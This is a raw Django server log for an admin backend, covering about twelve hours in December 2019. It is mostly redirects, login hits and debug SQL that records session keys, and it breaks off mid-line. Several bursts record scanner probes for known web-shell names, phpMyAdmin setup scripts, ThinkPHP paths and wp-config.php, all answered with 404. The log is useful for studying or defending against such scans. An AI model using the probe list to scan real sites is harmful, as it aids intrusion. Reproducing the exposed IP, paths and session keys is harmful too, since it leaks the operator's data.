"/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [07/Dec/2019 22:51:35] "POST /editBlackAndWhiteList HTTP/1.0" 500 63819 [07/Dec/2019 22:52:46] "GET / HTTP/1.0" 302 0 [07/Dec/2019 22:57:49] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:20:10] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:25:13] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:26:39] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 23:26:40,101 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nobcbcyw213lxm9jqrrueexp8o07rnxo' LIMIT 1; args=('nobcbcyw213lxm9jqrrueexp8o07rnxo',) DEBUG 2019-12-07 23:26:40,104 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nobcbcyw213lxm9jqrrueexp8o07rnxo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T23:26:40.102499+00:00'::timestamptz); args=('nobcbcyw213lxm9jqrrueexp8o07rnxo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 23, 26, 40, 102499, tzinfo=)) [07/Dec/2019 23:26:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 23:28:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 23:28:42,565 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cvdauvx33s9fsuu5g3vaeekcbx8ykhv2' LIMIT 1; args=('cvdauvx33s9fsuu5g3vaeekcbx8ykhv2',) DEBUG 2019-12-07 23:28:42,566 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cvdauvx33s9fsuu5g3vaeekcbx8ykhv2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T23:28:42.565505+00:00'::timestamptz); args=('cvdauvx33s9fsuu5g3vaeekcbx8ykhv2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 23, 28, 42, 565505, tzinfo=)) [07/Dec/2019 23:28:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 23:30:16] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:46:08] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:47:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:53:47] "GET / HTTP/1.0" 302 0 [07/Dec/2019 23:58:49] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:06:29] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:11:31] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:18:04] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:23:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:28:09] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:37:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:40:02] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 00:42:39] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [08/Dec/2019 00:43:46] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [08/Dec/2019 00:44:00] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=104 HTTP/1.0" 404 6705 Not Found: /newslist.asp [08/Dec/2019 00:44:14] "GET /newslist.asp?type=4&id=1290 HTTP/1.0" 404 6649 [08/Dec/2019 00:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 00:46:55] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:47:42] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:52:44] "GET / HTTP/1.0" 302 0 [08/Dec/2019 00:57:47] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:05:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:08:52] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:15:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:20:10] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:26:00] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:31:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 01:31:28,823 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dyq99k4f6gg6dpt71asoesc8wi7puqrx' LIMIT 1; args=('dyq99k4f6gg6dpt71asoesc8wi7puqrx',) DEBUG 2019-12-08 01:31:28,824 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dyq99k4f6gg6dpt71asoesc8wi7puqrx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T01:31:28.823453+00:00'::timestamptz); args=('dyq99k4f6gg6dpt71asoesc8wi7puqrx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 1, 31, 28, 823453, tzinfo=)) [08/Dec/2019 01:31:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 01:32:36] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:37:46] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:42:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:50:34] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:55:30] "GET / HTTP/1.0" 302 0 [08/Dec/2019 01:55:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:05:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:05:40] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:10:05] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [08/Dec/2019 02:12:43] "HEAD /robots.txt HTTP/1.0" 404 6627 [08/Dec/2019 02:17:21] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:22:23] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:27:00] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:27:26] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:32:36] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:37:38] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:42:45] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:47:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 02:52:50] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:00:01] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:04:49] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-08 03:04:50,203 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '13jl60qq11qlcjkkmdrr686hrorbcvk2' LIMIT 1; args=('13jl60qq11qlcjkkmdrr686hrorbcvk2',) DEBUG 2019-12-08 03:04:50,205 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('13jl60qq11qlcjkkmdrr686hrorbcvk2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T03:04:50.204300+00:00'::timestamptz); args=('13jl60qq11qlcjkkmdrr686hrorbcvk2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 3, 4, 50, 204300, tzinfo=)) [08/Dec/2019 03:04:50] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [08/Dec/2019 03:09:56] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:14:58] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:20:01] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 03:21:02,423 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-08T03:21:02.414424+00:00'::timestamptz AND "django_session"."session_key" = 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy'); args=(datetime.datetime(2019, 12, 8, 3, 21, 2, 414424, tzinfo=), 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy') DEBUG 2019-12-08 03:21:02,448 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-22T03:21:02.446607+00:00'::timestamptz WHERE "django_session"."session_key" = 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 3, 21, 2, 446607, tzinfo=), 'cnajvikq6z9nb4yd4ibtlm5c6ihiwhxy') [08/Dec/2019 03:21:02] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /favicon.ico [08/Dec/2019 03:21:02] "GET /favicon.ico HTTP/1.0" 404 6627 [08/Dec/2019 03:23:51] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:25:04] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:30:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:37:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:42:40] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:47:42] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:52:45] "GET / HTTP/1.0" 302 0 [08/Dec/2019 03:57:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:10:28] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:15:31] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:20:34] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:25:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:31:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 04:31:28,763 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'regp64s5pvs49m5d1u72afz797r0ye2p' LIMIT 1; args=('regp64s5pvs49m5d1u72afz797r0ye2p',) DEBUG 2019-12-08 04:31:28,764 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('regp64s5pvs49m5d1u72afz797r0ye2p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T04:31:28.763526+00:00'::timestamptz); args=('regp64s5pvs49m5d1u72afz797r0ye2p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 4, 31, 28, 763526, tzinfo=)) [08/Dec/2019 04:31:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 04:32:36] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:38:31] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:41:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 04:41:40,835 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'y8nopa9dc6u3f23qwwspk6gu5f1skpyt' LIMIT 1; args=('y8nopa9dc6u3f23qwwspk6gu5f1skpyt',) DEBUG 2019-12-08 04:41:40,837 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('y8nopa9dc6u3f23qwwspk6gu5f1skpyt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T04:41:40.835670+00:00'::timestamptz); args=('y8nopa9dc6u3f23qwwspk6gu5f1skpyt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 4, 41, 40, 835670, tzinfo=)) [08/Dec/2019 04:41:40] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [08/Dec/2019 04:41:41] "GET /robots.txt HTTP/1.0" 404 6637 Not Found: /favicon.ico [08/Dec/2019 04:41:41] "GET /favicon.ico HTTP/1.0" 404 6640 [08/Dec/2019 04:43:38] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:45:18] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:53:04] "GET / HTTP/1.0" 302 0 [08/Dec/2019 04:58:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:05:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:20:10] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:25:13] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:31:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:37:37] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [08/Dec/2019 05:39:21] "GET /proxy.php HTTP/1.0" 404 6629 [08/Dec/2019 05:40:02] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 05:42:40] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:47:42] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [08/Dec/2019 05:52:02] "GET /proxy.php HTTP/1.0" 404 6627 [08/Dec/2019 05:52:45] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:52:50] "GET / HTTP/1.0" 302 0 [08/Dec/2019 05:57:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:20:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:30:04] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [08/Dec/2019 06:36:23] "GET /manager/html HTTP/1.0" 404 6629 [08/Dec/2019 06:37:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:42:40] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:51:47] "GET / HTTP/1.0" 302 0 [08/Dec/2019 06:56:50] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:10:02] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 07:10:06] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [08/Dec/2019 07:18:41] "GET /favicon.ico HTTP/1.0" 404 6627 [08/Dec/2019 07:20:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:25:13] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 07:31:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:31:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 07:31:28,843 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4u0a4h1lbg3dcbgrop9qjxa7f9tpmzau' LIMIT 1; args=('4u0a4h1lbg3dcbgrop9qjxa7f9tpmzau',) DEBUG 2019-12-08 07:31:28,844 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4u0a4h1lbg3dcbgrop9qjxa7f9tpmzau', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T07:31:28.843584+00:00'::timestamptz); args=('4u0a4h1lbg3dcbgrop9qjxa7f9tpmzau', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 7, 31, 28, 843584, tzinfo=)) [08/Dec/2019 07:31:28] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /TP/public/index.php [08/Dec/2019 07:35:36] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [08/Dec/2019 07:35:36] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [08/Dec/2019 07:35:37] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [08/Dec/2019 07:35:37] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [08/Dec/2019 07:35:39] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [08/Dec/2019 07:35:41] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [08/Dec/2019 07:35:42] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [08/Dec/2019 07:35:43] "GET /index.php HTTP/1.0" 404 6620 [08/Dec/2019 07:35:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 07:35:45,343 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'xd4qj6xu5uve4t33m1k6kw4jsitm68qk' LIMIT 1; args=('xd4qj6xu5uve4t33m1k6kw4jsitm68qk',) DEBUG 2019-12-08 07:35:45,345 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('xd4qj6xu5uve4t33m1k6kw4jsitm68qk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T07:35:45.344086+00:00'::timestamptz); args=('xd4qj6xu5uve4t33m1k6kw4jsitm68qk', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 7, 35, 45, 344086, tzinfo=)) [08/Dec/2019 07:35:45] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 07:36:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:37:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:44:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:45:29] "GET / HTTP/1.0" 302 0 [08/Dec/2019 07:53:16] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:00:01] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:09:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:15:34] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:20:36] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:25:39] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:30:42] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:37:37] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:42:40] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:47:43] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:52:45] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:57:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 08:59:43] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:15:09] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:24:19] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:29:21] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:34:24] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:39:27] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:47:12] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:52:15] "GET / HTTP/1.0" 302 0 [08/Dec/2019 09:57:18] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:06:01] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:20:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:25:39] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:29:00] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:30:42] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 10:34:11,428 utils 32196 139885061072640 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'g7xp7n7qlyc84oldixkpq4lo1oto0uz7' LIMIT 1; args=('g7xp7n7qlyc84oldixkpq4lo1oto0uz7',) DEBUG 2019-12-08 10:34:11,430 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('g7xp7n7qlyc84oldixkpq4lo1oto0uz7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T10:34:11.429110+00:00'::timestamptz); args=('g7xp7n7qlyc84oldixkpq4lo1oto0uz7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 10, 34, 11, 429110, tzinfo=)) [08/Dec/2019 10:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 10:35:45] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:40:48] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:45:51] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:50:54] "GET / HTTP/1.0" 302 0 [08/Dec/2019 10:55:17] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [08/Dec/2019 10:55:17] "GET /robots.txt HTTP/1.0" 404 6623 Not Found: /Adminb5512046/Login.php [08/Dec/2019 10:55:18] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6663 [08/Dec/2019 10:55:19] "GET / HTTP/1.0" 302 0 Not Found: /l.php [08/Dec/2019 10:55:20] "GET /l.php HTTP/1.0" 404 6608 Not Found: /phpinfo.php [08/Dec/2019 10:55:22] "GET /phpinfo.php HTTP/1.0" 404 6626 Not Found: /test.php [08/Dec/2019 10:55:23] "GET /test.php HTTP/1.0" 404 6617 Not Found: /index.php [08/Dec/2019 10:55:25] "POST /index.php HTTP/1.0" 404 6621 Not Found: /bbs.php [08/Dec/2019 10:55:26] "POST /bbs.php HTTP/1.0" 404 6615 Not Found: /forum.php [08/Dec/2019 10:55:27] "POST /forum.php HTTP/1.0" 404 6621 Not Found: /forums.php [08/Dec/2019 10:55:27] "POST /forums.php HTTP/1.0" 404 6624 Not Found: /bbs/index.php [08/Dec/2019 10:55:28] "POST /bbs/index.php HTTP/1.0" 404 6633 Not Found: /forum/index.php [08/Dec/2019 10:55:32] "POST /forum/index.php HTTP/1.0" 404 6639 DEBUG 2019-12-08 10:55:40,994 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [08/Dec/2019 10:55:41] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [08/Dec/2019 10:55:44] "GET /help.php HTTP/1.0" 404 6617 Not Found: /java.php [08/Dec/2019 10:55:45] "GET /java.php HTTP/1.0" 404 6617 Not Found: /_query.php [08/Dec/2019 10:55:46] "GET /_query.php HTTP/1.0" 404 6623 Not Found: /test.php [08/Dec/2019 10:55:50] "GET /test.php HTTP/1.0" 404 6617 Not Found: /db_cts.php [08/Dec/2019 10:55:50] "GET /db_cts.php HTTP/1.0" 404 6623 Not Found: /db_pma.php [08/Dec/2019 10:55:51] "GET /db_pma.php HTTP/1.0" 404 6623 Not Found: /logon.php [08/Dec/2019 10:55:52] "GET /logon.php HTTP/1.0" 404 6620 Not Found: /help-e.php [08/Dec/2019 10:55:54] "GET /help-e.php HTTP/1.0" 404 6623 Not Found: /log.php [08/Dec/2019 10:55:57] "GET /log.php HTTP/1.0" 404 6614 Not Found: /hell.php [08/Dec/2019 10:55:59] "GET /hell.php HTTP/1.0" 404 6617 Not Found: /x.php [08/Dec/2019 10:56:04] "GET /x.php HTTP/1.0" 404 6608 Not Found: /shell.php [08/Dec/2019 10:56:05] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /htdocs.php [08/Dec/2019 10:56:06] "GET /htdocs.php HTTP/1.0" 404 6623 Not Found: /b.php [08/Dec/2019 10:56:07] "GET /b.php HTTP/1.0" 404 6608 Not Found: /sane.php [08/Dec/2019 10:56:09] "GET /sane.php HTTP/1.0" 404 6617 Not Found: /desktop.ini.php [08/Dec/2019 10:56:10] "GET /desktop.ini.php HTTP/1.0" 404 6638 [08/Dec/2019 10:56:11] "GET / HTTP/1.0" 302 0 Not Found: /lala-dpr.php [08/Dec/2019 10:56:17] "GET /lala-dpr.php HTTP/1.0" 404 6629 Not Found: /wpc.php [08/Dec/2019 10:56:25] "GET /wpc.php HTTP/1.0" 404 6614 Not Found: /t6nv.php [08/Dec/2019 10:56:29] "GET /t6nv.php HTTP/1.0" 404 6617 Not Found: /muhstik.php [08/Dec/2019 10:56:30] "GET /muhstik.php HTTP/1.0" 404 6626 Not Found: /text.php [08/Dec/2019 10:56:31] "GET /text.php HTTP/1.0" 404 6617 Not Found: /wp-config.php [08/Dec/2019 10:56:32] "GET /wp-config.php HTTP/1.0" 404 6632 Not Found: /muhstik2.php [08/Dec/2019 10:56:35] "GET /muhstik2.php HTTP/1.0" 404 6629 Not Found: /muhstiks.php [08/Dec/2019 10:56:36] "GET /muhstiks.php HTTP/1.0" 404 6629 Not Found: /muhstik-dpr.php [08/Dec/2019 10:56:37] "GET /muhstik-dpr.php HTTP/1.0" 404 6638 Not Found: /lol.php [08/Dec/2019 10:56:39] "GET /lol.php HTTP/1.0" 404 6614 Not Found: /uploader.php [08/Dec/2019 10:56:41] "GET /uploader.php HTTP/1.0" 404 6629 Not Found: /cmv.php [08/Dec/2019 10:56:44] "GET /cmv.php HTTP/1.0" 404 6614 Not Found: /cmdd.php [08/Dec/2019 10:56:48] "GET /cmdd.php HTTP/1.0" 404 6617 Not Found: /cmd.php [08/Dec/2019 10:57:00] "GET /cmd.php HTTP/1.0" 404 6614 Not Found: /shell.php [08/Dec/2019 10:57:09] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /appserv.php [08/Dec/2019 10:57:10] "GET /appserv.php HTTP/1.0" 404 6626 Not Found: /phpmyadmin/scripts/setup.php [08/Dec/2019 10:57:16] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /phpMyAdmin/scripts/setup.php [08/Dec/2019 10:57:18] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /scripts/db___.init.php [08/Dec/2019 10:57:19] "GET /scripts/db___.init.php HTTP/1.0" 404 6659 Not Found: /phpmyadmin/scripts/db___.init.php [08/Dec/2019 10:57:40] "GET 